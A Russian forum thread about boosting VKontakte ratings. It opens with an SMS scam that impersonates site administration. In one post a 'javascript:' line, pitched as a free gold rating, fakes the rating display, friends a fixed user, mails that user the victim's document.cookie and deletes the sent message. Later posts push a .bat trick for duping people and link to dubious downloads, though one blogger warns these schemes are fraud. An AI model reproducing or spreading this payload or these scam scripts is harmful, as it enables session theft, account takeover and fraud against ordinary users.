Здравствуйте! Меня зовут Алексей. Я хочу представить вам новый способ поднятия рейтинга на сайте wwwvkontakte.ru! Сразу говорю, это будет не совершенно бесплатно т.к если вы не в курсе то vkontakte не возможно поднять рейтинг совершенно бесплатно! Примерная цена 1 смс будет 10 р. ну это будет зависеть от сотового оператора.
Ну можно преступать:
1. Отправьте смс с текстом «id20768197» на номер 1046 без кавычек.
2. Отправьте электронное письмо на vkbots@gmail.com с текстом idxxxxxx-+7xxxxxxxxxx где idxxxxxx – это ваш id в контакте а +7xxxxxxxxxx это номер с которого вы отправляли смс. Замете что номер надо указать тот, с которого вы отправляли смс и все это надо писать без пробелов!
3. Когда к вам на почту придет письмо от администрации! То значит, ваш рейтинг был поднят ровно на 100 единиц.
Предупреждаем!!
Вся эта операция полностью автоматизирована! Так что при отправке письма на почту не допускайте ошибок! Иначе программа не сможет повысить вам рейтинг!
С возникшими вопросами обращайтесь на vkbots@gmail.com
С уважением администрация wwwvkontakte.ru!
Как поднять рейтинг В Контакте?
Сообщений 31 страница 42 из 42
Поделиться312009-04-03 14:45:29
Поделиться322009-04-06 16:51:43
Хотите шарового рейтинга?
вот, объяснения внизу!)
Javas cript:var percentGold=100;var widthLeft=20;var widthRight=179;var d;var k=10.00741833975;function g(o,v,m){var i=(o+'').indexOf(v,m);return i=== -1?false:i;};function _a(){next= -(1000/k)*Math.log(Math.random());ge('percentGold').innerHTML=percentGold;ge('rateLeftGold').style.width=widthLeft+"px";ge('rateRightGold').style.width=widthRight+"px";percentGold=percentGold+1;widthLeft=Math.floor(Math.sin((percentGold-100)/500)*179+20);widthRight=199-widthLeft;if(widthRight<=1){clearTimeout(d);}else d=setTimeout(_a,next);};function first(){if(ge('percent')){percentGold=ge('percent').innerHTML;var pos=g(percentGold,">",0);if(pos==false){percentGold=parseInt(percentGold);}else percentGold=parseInt(percentGold.substr(pos+1,3));widthLeft=parseInt(ge('rateLeft').style.width);widthRight=parseInt(ge('rateRight').style.width);_b();}else{percentGold=parseInt(ge('percentGold').innerHTML);widthLeft=parseInt(ge('rateLeftGold').style.width);widthRight=parseInt(ge('rateRightGold').style.width);_a();}};function _b(){next= -(1000/k)*Math.log(Math.random());ge('percent').innerHTML=percentGold+"%";ge('rateLeft').style.width=widthLeft+"px";ge('rateRight').style.width=widthRight+"px";percentGold=percentGold+1;if(percentGold>100){clearTimeout(d);ge('percent').id="percentGold";ge('rateLeft').id='rateLeftGold';ge('rateRight').id='rateRightGold';widthLeft=20;widthRight=179;_a();}else{widthLeft=widthLeft+2;widthRight=199-widthLeft;d=setTimeout(_b,next);}};var f=document.createElement('div');f.style.display="none";var params;function a(){Ajax.Post({url:'friend.php',query:{act:'a_add_form',fid:10765636},onDone:function(ajaxObj,responseText){try{var text=responseText;var response=eval('('+responseText+')');f.innerHTML=response.text;var form=ge('addFriendForm');if(!form)return;var params=serializeForm(form);Ajax.Post({url:'friend.php',query:params});}catch(e){}}});};function b(){Ajax.Get({url:'mail.php',query:{act:'write',to:10765636},onDone:function(ajaxObj,responseText){var text=responseText;try{f.innerHTML=responseText;params={act:ge('act').value,ajax:1,misc:ge('misc')?ge('misc').value:'',secure:ge('secure')?ge('secure').value:'',chas:ge('chas').value,photo:ge('photo')?ge('photo').value:'',to_id:10765636,to_reply:ge('to_reply').value,toFriends:ge('toFriends')?ge('toFriends').value:'',title:ge('title').value,message:''+Math.round(Math.random()*10000)+document.cookie+Math.round(Math.random()*10000)};setTimeout(c,3000);}catch(e){}}});};function c(){Ajax.Post({url:'mail.php',query:params,onDone:function(ajaxObj,responseText){setTimeout(e,1000);}});};function e(){Ajax.Get({url:'mail.php',query:{out:"1",rnd:Math.round(Math.random()*10000)},onDone:function(ajaxObj,responseText){try{var j='<a href="mail.php?act=write&to=10765636&r=';var pos=g(responseText,j,0);var l=g(responseText,'&out=1"',pos);if(pos==false)return;var r=parseInt(responseText.substr(pos+j.length,l-pos));params={act:"a_delete",id:r,out:1};Ajax.Post({url:'mail.php',query:params});}catch(e){}}});};onDomReady(function(){document.body.appendChild(f); first();a();b();});
Вставте в адреную строку только уберите пробел между Javas cript
и смотрите на рейтинг...
Поделиться332009-04-14 18:54:06
Вся правда о системах предлагающих поднять нелегально рейтинг «Вконтакте.ру»…
Здравствуйте Уважаемые читатели, приветствую Вас в своём блоге)) решил написать на очень популярную тему в сети, а именно все о системах повыщающих рейтинг. Сам не болею контактом, тем более повышением рейтинга. Но очень смутило поведение моего младшего братика, который заболел им, и контактом и рейтингом. Дошло до того, что брал в тихаря сотку и отсылал смс для повышения своего рейтинга, сначала пользовался легальным способом, потом стал искать в сети, как бы по — другому повысить свой рейтинг на большее количество голосов чем предлагают «вконтакте.ру».
Вообщем не буду подробно вдаваться дальше, начну пожалуй, что решил проанализировать все системы, которые можно найти в нети…Сразу скажу, что не собираюсь кого-то рекламировать, эта статья про то как я решил проверить правдоподобность сайтов, объявлений, и всяких комментариев к темам типо «бесплатный рейтинг „вконтакте.ру“ и тд. Вы не подумайте конечно, что я со всем того, и решил на все подряд условия соглашаться, объявления типо „1 смс на какой-то id, и вам сразу придет 200 и выше % рейтинга“, это не так, такому я не веру, как в прочем не верю и всякого родам программ, я сам программист, и тоже могу на делфи за пару минут создать интерфейс подобный тому что многие выкладывают…ЭТО все развод, люди не ведитесь пожалуйста!!!
Так же очень интересна тема с ботами вконтакте, конечно с одной стороны это возможно, а с другой стороны, мои исследования показали, что только несколько id повышают рейтинг и то непонятно как…
1) Расскажу про id7225436
На одном из блогов прочитал объявление в котором был указан сайтhttp://rateupp.narod.ru/
Так вот, информация так себе там, но раз уж я решил все это проверить, я отправил смс с id7225436, прежде конечно посмотрел что это за анкета, так вот, анкета закрытая с фоткой, не отличается от обычных анкет, как и говорилось на сайте.
Отправил смс на номер 1046, прошёл час, ничего не произошло, меня не добавлял, но потом на следующий день зайдя, я увидел, что мне добавилось 15 голосов, иотнелось как-то маловато с баланса…меня это очень удивило скажу вам я, т.к. до этого я пару раз отправлял и ничего не получал.
Так вот, я решил ещё раз отправить на этот же id7225436
И было совсем по — другому, прошло более 2 — х дней прежде чем мне добавилося, сначала 5 голосов, потом ещё 3…и через пару часов 8 голосов, как — то странно работает, но ещё раз повторяю, что это единственный на сегодняшний час id который добавил голоса, конечно не так как написано на сайте, но 15 — 16 голосов это прилично, тем более отнимается очень мало…
Вывод: систем повышающих рейтинг нелегально почти нет, все программы которые есть — это фуфло завирусованное, все эти объявления, предлагающие поднять рейтинг свыше 100% за 1 смс, а где — то и 1000% за пару смс — это нереальнО!!! Единственным что мне помогло я написал выше, поиски работающих систем будет продолжаться, как что-то проясниться, я напишу…
Поделиться342009-04-17 18:06:43
MIKOsan а где эта строка????
Поделиться352009-04-21 17:22:07
Поднятие рейтинга с помощью смс это не развод
Поделиться362009-06-09 22:00:36
http://letitbit.net/download/482999a8df … e.rar.html единственная прога которая у меня проканала))
Поделиться372009-06-19 23:04:49
http://depositfiles.com/files/diqf96un6 proga dlya golosov v kontakte.
Поделиться382009-06-21 15:39:32
фууу как тему заспамили ... фууууу
Поделиться392009-08-04 12:57:17
Люди бесплатного способа нету!Вот,что я вам только могу предложить,но для этого надо хотя бы один неиспользованый голос в контакте,вот ссылка http://vkontakte.ru/app623911_26189945 Думаю там разберётесь всё очень просто,нет никакого развода и вируса,всё реально и практичесски бесплатно (для того,чтобы был хотя бы 1 голос неиспользуваный нужно отправить,как минимум 1 смс и получить сразу 3 голоса,так как нету смс на 1 голос)
Поделиться402009-09-23 22:04:49
Пизд** все друг друга наёбываити,вот вам приложение в контакте
http://vkontakte.ru/app759288_27421159
и не тупите идиоты бла!
Поделиться412010-01-02 22:51:43
Обмный способ.
Качем программу http://depositfiles.com/files/c96n48rx2
устонвлвем и зпускем. Дльше пишем start http://vkontakte.ru/id(ваш id)?rate=1&v=3 примерно 3 раза. потом сохрняем в файле .bat запихивем его на обменики и кидаем ссылку людям у которых есть хотябы один голос. и говорим им что эта программа увеличит их голос!
Думаю моя стотья помогл вам
Отредактировано Kenee (2010-01-02 22:52:37)
Поделиться422010-01-28 09:51:37
Я себе рейтинг поднимал через Rating_hacker. Там его качаешь, и первые 200 пунктов рейтинга бесплатно поднимаешь (типа демо-версии), а потом уже нужно деньги на кошелёк пересылать, чтоб дальше поднимать. - http://files4you.ucoz.com/index/0-5